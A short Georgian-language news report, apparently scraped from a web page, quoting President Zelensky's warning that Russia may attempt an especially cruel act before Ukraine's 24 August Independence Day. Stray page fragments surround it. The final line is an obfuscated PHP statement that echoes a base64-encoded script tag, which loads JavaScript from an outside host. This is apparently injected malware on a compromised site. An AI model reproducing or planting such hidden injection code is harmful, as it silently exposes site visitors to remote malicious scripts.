celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აცხადებს, რომ რუსეთი შესაძლოა მომავალ კვირას შეეცადოს რაიმე „განსაკუთრებული სისასტიკე“ ჩაიდინოს. ამის შესახებ მან ვიდეომიმართვისას ისაუბრა.
 
"ჩვენ უნდა ვიცოდეთ, რომ ამ კვირაში რუსეთი შეიძლება შეეცადოს რაღაც განსაკუთრებით ამაზრზენსა და განსაკუთრებით სასტიკს. ასეთია ჩვენი მტერი. მაგრამ ნებისმიერ სხვა კვირაში ამ ექვსი თვის განმავლობაში რუსეთი ყოველთვის იგივეს აკეთებდა - ამაზრზენსა და სასტიკს“ – აღნიშნა პრეზიდენტმა.
 
მისი თქმით, მტრის ერთ-ერთი მთავარი ამოცანაა უკრაინელების დამცირება, შესაძლებლობების და გმირობის გაუფასურება, სასოწარკვეთის, შიშის და კონფლიქტის გაღვივება.
 
"ამიტომ მნიშვნელოვანია, რომ არც ერთი წუთით არ დანებდეთ მტრის ამ წნეხს, არ გამოვავლინოთ სისუსტე. ჩვენ ყველანი უნდა ვიყოთ საკმარისად ძლიერი, რომ წინააღმდეგობა გავუწიოთ მტრის ნებისმიერ პროვოკაციას" ამბობს ის.
 
შეგახსენებთ, რომ უკრაინა 24 აგვისტოს დამოუკიდებლობის დღეს აღნიშნავს.
588
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");